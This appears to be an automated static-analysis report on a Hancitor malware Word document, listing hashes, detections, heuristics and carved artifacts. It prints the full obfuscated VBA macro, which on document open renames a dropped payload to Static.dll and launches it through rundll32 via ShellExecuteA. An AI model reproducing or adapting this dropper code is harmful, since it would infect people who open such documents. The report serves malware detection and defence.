Hancitor — Office (OOXML) malware analysis

Static analysis result for SHA-256 29895946a5e2cfde…

MALICIOUS

Office (OOXML)

718.2 KB Created: 2021-03-18 05:31:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-01
MD5: c308b1046bb262f489220da6718ceca6 SHA-1: c4ba3a3717e40e0d608913ee6dea167e89231c01 SHA-256: 29895946a5e2cfdeb14e0d89d66cf41277e31a5262dd38c674ffc47d6904256b
210 Risk Score

Malware Insights

Hancitor · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Hancitor-9845854-0. The VBA macro code contains a Document_Open subroutine that calls a function to execute a payload. The script uses ShellExecuteA to run a constructed executable path, likely downloaded by the embedded OLE object.

Heuristics 6

  • ClamAV: Doc.Dropper.Hancitor-9845854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5030 bytes
SHA-256: 9d7b2a93206eb3e44f1f97fefee1900f698e0d6bc85c6ed6eb80649305fd09e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

  Private Declare PtrSafe Function Hogo Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long

Private Const SW_SHOWNORMAL = 1

Private Sub Document_Open()
Call stetptwwo
End Sub



Sub stetptwwo()
Dim nvbnf As String
 Dim yy As String

 Dim bcvxz As String
nvbnf = "\Static.d"
Dim vxcv As Integer
Dim hugs As Integer
hugs = chek

Dim ede As String
If hugs = 1 Then
Else
Dim edef As String

Call hhhhh
Dim pafh As String
pafh = iep
 bcvxz = pafh
Dim geto As String
Dim pus As String

geto = "nd"
Dim ter As String

Dim iof As String
iof = "3"
ter = "e"
iof = iof & "2"
Dim hgl As String
Dim jsd As String
jsd = geto
 Dim hh As String
 hh = iof & "." & ter & "xe"
 Dim fps As String
 fps = "r"
Dim laz As String
laz = "l"
 Dim fa As String
 fa = fps & "u" & jsd & "l" & laz & hh


hgl = ks
yy = bcvxz & nvbnf & hgl & hgl & ",LSAKWTRUDIO"

  Hogo 0, vbNullString, _
    fa, yy, _
     vbNullString, SW_SHOWNORMAL
End If
End Sub



Attribute VB_Name = "Module1"
  


Function Getme(RootPath As String)
Dim hor As String

Dim fso As Object
Dim fld As Object
Dim vhhs As Object
Dim afs As String
Dim myArr
Dim pafh As String
pafh = iep
hor = pafh
Dim asdf
Dim cheza As String

asdf = RootPath
Dim fer As String

Set fso = CreateObject("Scripting.FileSystemObject")

Set fld = fso.GetFolder(asdf)
Dim uuj As String
uuj = "\msals.pumpl"
strFileExists = Dir(RootPath & uuj)
      If strFileExists = "" Then
    
For Each vhhs In fld.SUBFOLDERS


afs = vhhs
Dim kkl As String

kkl = Application.Run("Getme", vhhs.Path)


Next
    Set vhhs = Nothing
Getme = myArr
Set fld = Nothing
Set fso = Nothing



    Else
    Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\" & "Static.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", RootPath)

      Else
      Exit Function
  End If
    
        End If


End Function





Function chek()

Dim jos As String
Dim pafh As String
pafh = iep
jos = pafh

 
 If Dir(jos & "\" & "Static.d" & "l" & "l") = "" Then
 chek = 0
 Else

 chek = 1
 End If
End Function






Function ks()
Dim askl As String
askl = fuxk
ks = Left(askl, 1)
End Function




Sub nm(ololow As String)
Dim pafh As String
pafh = iep
  Name ololow & "\msals.pumpl" As pafh & "\" & "Static.d" & "l" & "l"
End Sub


Attribute VB_Name = "Module2"
Sub hi(myhome As String)
Dim plop As String
Dim pafh As String
pafh = iep
plop = pafh
Call jop(myhome, plop & "\" & "Static.d" & "l" & "l")
End Sub


Sub hhhhh()
Dim posl As String
Dim pafh As String
pafh = iep
posl = pafh
Dim ntgs
Dim sda
Call cvbc
    ntgs = 50
sda = 49
Dim jos As String
jos = posl
Dim yer As String
yer = "Loc" & "al" & "\Te" & "mp"
While sda < 50
      ntgs = ntgs - 1
      
      If Dir(Left(jos, ntgs) & yer, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Dim klas As String
   klas = posl
Call Getme(Left(klas, ntgs) & yer)
  Selection.TypeBackspace
   

End Sub











Function lka(ff As String)
lka = ff
End Function






Attribute VB_Name = "Module3"



Function iep()
iep = Options.DefaultFilePath(wdStartupPath)
End Function





Attribute VB_Name = "Module4"


Sub checkthe(sf As String)

Dim pafh As String
pafh = iep

Dim ololow As String
ololow = sf
Dim nothings As String
nothings = 2

    If Dir(sf & "\msals.pumpl") = "" Then
    
    Else
         If Dir(nothings) = "" Then

        Call nm(ololow)
    Else
   Exit Sub
    End If
  
    End If
End Sub





Sub jop(uuu As String, aaaa As String)

Call rnee(uuu, aaaa)
End Sub



Sub bcvxzc()
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
       Selection.TypeBackspace
Call asfa
End Sub



Sub cvbc()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
 Selection.MoveDown Unit:=wdLine, Count:=23
Call bcvxzc
End Sub


Sub asfa()
   Selection.Copy
End Sub







Attribute VB_Name = "Module5"


Sub rnee(myhome As String, hsa As String)

Name myhome & "\msals.pu" & "mpl" As hsa
End Sub





Function fuxk()
fuxk = ThisDocument.Tables(1).Cell(1, 1).Range.Text
End Function
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 225280 bytes
SHA-256: 90009f21c2f99f31099752c6841bb44bf53c6a510c52a627fb328a1baad46c6e
Detection
ClamAV: Win.Packed.Hancitor-9861452-0
Obfuscation or payload: unlikely
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML word/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 215373 bytes
SHA-256: ec312239eb3bd40cdc3c9964847444f5a5583ac226e747414c60cdf561614a57
Detection
ClamAV: Win.Packed.Hancitor-9861452-0
Obfuscation or payload: unlikely
ooxml_oleobject_00_ole10native_00_msals.pumpl ole-package-payload OOXML word/embeddings/oleObject1.bin Ole10Native payload: display_name=msals.pumpl; full_path=C:\Users\MyPc\AppData\Local\Temp\msals.pumpl; temp_path=; def_file= 215040 bytes
SHA-256: 0ef38183eb6fd4c30d85ef87c6015e0ebf5b5b911ad17f462bd105b1dcceac57
Detection
ClamAV: Win.Packed.Hancitor-9861452-0
Obfuscation or payload: unlikely
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40448 bytes
SHA-256: 99c4c31a2dbb07087df1f6fe403ee6d3f029b4af46c4bc802074621f307dfed8
Detection
ClamAV: Doc.Dropper.Hancitor-9845854-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: word/media/image2.emf 5000 bytes
SHA-256: beb0d77eba27e18607561fa6f997202e3645395c0f9b9fe78610523149701608

Open this report in the interactive analyzer, or submit your own file for analysis.